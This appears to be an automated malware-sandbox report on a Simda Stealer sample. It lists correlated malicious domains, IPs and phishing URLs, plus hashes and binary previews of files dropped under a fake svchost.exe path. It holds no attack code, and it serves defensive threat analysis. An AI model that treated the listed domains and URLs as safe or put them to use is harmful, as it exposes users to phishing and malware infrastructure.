                                                                                                                                                                                                          https://www.pnxubwf.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 199.59.243.226
                                                                                                                                                                                                          pupycag.com5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 34.174.78.212
                                                                                                                                                                                                          10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 199.21.76.77
                                                                                                                                                                                                          pupydeq.com5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          iN9u7DdJv4.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          szLAUZKesq.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          lyvyxor.com5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          kz2xIsjyEH.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          NBS11696US5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 64.190.63.136
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 64.190.63.136
                                                                                                                                                                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          TANDEMUS5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 15.197.240.20
                                                                                                                                                                                                          https://amazon-103093.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://amazon-102823.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://amazon-103409.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://amazon-101745.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://amazon-103277.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          v548OdIeBZ.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                          • 15.198.14.122
                                                                                                                                                                                                          https://amazon-102007.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://amazon-101490.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://amazon-101953.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 47.103.150.18
                                                                                                                                                                                                          #U4e0b#U8f7d-doc-uninsta.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                          • 39.97.203.15
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 47.103.150.18
                                                                                                                                                                                                          Quote #011698.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 47.104.180.139
                                                                                                                                                                                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 47.104.180.139
                                                                                                                                                                                                          DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 121.199.37.19
                                                                                                                                                                                                          https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 203.107.62.211
                                                                                                                                                                                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 47.104.180.139
                                                                                                                                                                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 116.62.79.152
                                                                                                                                                                                                          firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 120.27.222.47
                                                                                                                                                                                                          AMAZON-AESUSFZ6oyLoqGM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 34.205.242.146
                                                                                                                                                                                                          Leer documentos confidenciales anexos por parte de la Corte Suprema De Justicia.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.5.25.189
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 44.221.84.105
                                                                                                                                                                                                          2zYqUnx8qs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 44.221.84.105
                                                                                                                                                                                                          QTCc6zXJy3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 44.221.84.105
                                                                                                                                                                                                          https://amazon-104169.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 50.19.89.137
                                                                                                                                                                                                          https://amazon-103674.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 50.19.89.137
                                                                                                                                                                                                          https://amazon-103974.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.233.158.30
                                                                                                                                                                                                          https://conecctwvallete.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 52.200.196.77
                                                                                                                                                                                                          https://amazon-103093.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.235.101.7
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19yJrZoOsgfl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          IMKssbDprn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          uScqjqUS1m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          CVSIyqGKKK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          3ed8BceYsQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          #U4e0b#U8f7d-doc-uninsta.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          #U67e5_-uninstall.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):24649
                                                                                                                                                                                                          Entropy (8bit):7.980563941123399
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:P0YZ3Jjaxk9sU4B5xLlrzEoqxq/bVeNDRXY0F/6sstkMA3geAaD47owr:dZ3VGB5h6iVeNtoqpbQeR47owr
                                                                                                                                                                                                          MD5:4DF1B3EC5C348C25BFB294B58C8E03C4
                                                                                                                                                                                                          SHA1:EE435970559C914EDD58CB538B6E46B882C5CA73
                                                                                                                                                                                                          SHA-256:6CA593168A442C5FF1002A80D3185AB2ABB9591EE5E45DA86A860F31B2B8B3BB
                                                                                                                                                                                                          SHA-512:B9E74A5E4EFAD3D4D376ADEAE445981FFFEC87482D7FD98C2DA02D1AFCD9F0624E74C8EA2598579E8F8B5AEF2B5064DC9061BF06D876386C4D0A23BC0106E6DB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z.".....O.m..-..&.u....v.....m...^.c..L.i..pZ..L#..E2..E..r..1.+..}.p.3...iH5.&f..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.5..I.....<#.;/..5Z..*r.@....t..`dU:....G+U..Y..,..\X.R......... T.!.J..*s..,.%.-.....h..U..OT...f.h._..zf..^.".1.D.)"<..]Z.9..`..f4P..C\...@..n.'...li?=...I....{G...j.R.L5.JK=....S..6.BJ_Y_.((.IFb....,.>*..w...........$"..~...5..gk..~.07u.....7O...&.IlU.O..b.@.%.(9....j...d.%.7c.*#{K,.......6.V..Q0.....Ot.r.'.f.p.[.A.<..l@.".).....4.......].J.H.tN'..M.&..n.k.;.S.b.7...........J..f(....b.<....>.....NdIWm....{...(;$H....<.............l..+~..o.Nk.N...O...E..F.'%..s.#...\..{S...DE7*aX...~o.......#...f....c.K..B.M.b;..Jom.........Z..t.Y....l....n.O.pn...&..$&.........<.........0.,.M.3.........SCb..&\.L..Y.C.vD.(./...$u.V.=......U".~..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):7.626935561277827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                          MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                          SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                          SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                          SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):481
                                                                                                                                                                                                          Entropy (8bit):7.527776363899814
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NGjx1vBGFaAKSM9vcxlxsrSTRT03EUIW/h:MfvsFDKPhc19ah
                                                                                                                                                                                                          MD5:59321621F4AA76577A12A9F6DF32DC0A
                                                                                                                                                                                                          SHA1:6EDB83B47C1A51BA481FBB2BFF6AABF3A88E8A11
                                                                                                                                                                                                          SHA-256:3492AA93902DE0093A551C6F280003BF33663E59811ECC06E1CDA2ACF2F2C5B0
                                                                                                                                                                                                          SHA-512:25E62E1C49C44C697F5F6CDCA059C25B0C12D4FF14BD8C09A05DFA559CA91327382DE031B1F1E82567C7E38824F1A9BAE4DC1429D50BAFFD3B538F807FB45E16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:....tp.y)x`.T...x.6.wz.&.=Y..M4.".....+.....+.AQ....8.5...n',)...Q...k....C%!.;.l*}..m#.=..R-a7...o....*...L.?.sG..Z.Y....f.....D...#=.....D...^."..."..0>.Y..z0L....N{.VB+......4.@..N..=.v.:...:.(..m..iIz..g,C.(pU}.r...B...Y.L:.#..?../.\..X.k>...qz..3>...R..."f.|..^.~.|..$....]n.o...m..1..F...)..RR............_.R....}...?..GA..eC(\.W...,...!44.... `^=.t....8.".~..,...A..>....7^..f.S%'........s..........7C2..^.{{......m...}+aB.G[.u...v..t;C..R_......$.(...ej
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1226
                                                                                                                                                                                                          Entropy (8bit):7.841969824410941
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:IZsdS4WrVeqbxezuQj1kZ8l9KfPqiHb7xgk4qtrwRrY3D1/k:QsSrxbxez1Rg8yHgk4OrwC3G
                                                                                                                                                                                                          MD5:BEFCFA89C3EF283FCC257D8CF589E264
                                                                                                                                                                                                          SHA1:5807C5129242F9C60A72CCF0C80228194BEF28CC
                                                                                                                                                                                                          SHA-256:18437E988F00AD40E05A33F2FB3F2A18BA2CBE42021D10DB133BC3998564408F
                                                                                                                                                                                                          SHA-512:074A394C9A36EFA52B7610453A1F086A1CA3DA3E09936DEEC3DBA90CF6ADB78E1760D0EBAAC6535C95C0753C3E2958B3ECAB77EB9067E241463901BB2FF2BBE0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F<C.....7z.8.*.....6+.Z..;..k.j....G..J.._....n.b..|Je$y}n|..%..n<..O.cR..[......."..`..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^......(Ts..|....:.2.9....'.....-d9.....X...BpM....."..............:...-.9>.6..;R*..|........|.N>.*.$.d..aZ...R2#:\....+x.4S.^.._....p....m...&....(.9....kRpM......... .FlU....m......[.N@.......O........4..8%.....Y.3Rw.$.........f1..d.ZR....w.K..(. ....AGo.k......1.g..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):7.626935561277827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                          MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                          SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                          SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                          SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25019
                                                                                                                                                                                                          Entropy (8bit):7.981722510846547
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:WARva/n308nlnFMirDjlH/6QiOyNGQMyqHU4BzmWLtTBsI6WsXI0o3C+0A:W4ak8nl3r9Htbyq08/s/Ho3CVA
                                                                                                                                                                                                          MD5:4CCA350A458E78ECCB751A205B8FECDA
                                                                                                                                                                                                          SHA1:FD8D8F89C75D00777E921A10CCCF38E0727B9A68
                                                                                                                                                                                                          SHA-256:F79A239EB23E5310B058F316D73A939F6402E2093941EF7B2F9BA928E7D73200
                                                                                                                                                                                                          SHA-512:047027A1C226E4BFC7C2965E82EF6A0D39E636379ECD96B0B465F625BD674C42DE7BD522F2685F78C00BBE938E4B9AADFDF66CA71E581E8F61398FB93F732833
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g..?6.....K.D.......Q....i6...j..38`..t.]#6>ZT.t7..I\..S.O@.......:.&.>x.H$r..PE..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.945291531409476
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:7+gF+eVGkts5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN9y:vgeM8K0BU/gjRJk1zuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:C84EBD237A111578EF6F1CDA2DDFE87F
                                                                                                                                                                                                          SHA1:F01072F2FD444699E3510A35D175B093BC5585E7
                                                                                                                                                                                                          SHA-256:A0AC60F025465B091B7D7819377C53DB72875C6FBC8497E0244B877AC32489FA
                                                                                                                                                                                                          SHA-512:4CF822EA32597472ADEE74EC688705F5D69168F5A7BEBB5D370A1E1BECD3524FA8F527A141691A483F7B7D2FD5BA83CA6FE10F37FC25E999C414923EBF64A566
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.6.3.1.4.3.1.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.7.9.0.8.0.6.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.f.0.4.3.b.5.-.2.0.6.3.-.4.e.d.0.-.8.6.1.5.-.8.f.7.c.f.d.3.4.d.7.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.b.5.5.6.5.7.-.f.5.1.3.-.4.5.e.a.-.9.5.c.c.-.b.a.e.4.9.6.4.1.e.e.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.f.8.-.0.0.0.1.-.0.0.1.4.-.6.2.f.a.-.0.5.6.e.c.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.0.e.e.a.5.a.1.6.9.2.a.8.5.b.1.2.0.9.d.2.5.6.5.f.2.4.7.0.9.a.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....T.a.r.g.e.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9389214433880366
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:SmFtkeVGMs5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN9Wr:dEeMMK0BU/gjRJkVzuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:7D52919A0E1038188941CA0A23FBD25A
                                                                                                                                                                                                          SHA1:B2486A84A46CDEE5BF0D4E38761B77523B114A09
                                                                                                                                                                                                          SHA-256:6FA7FF5F86B3BDDB78638550D8AF0345D371388F1FB5C1C0ECB38FB861297D89
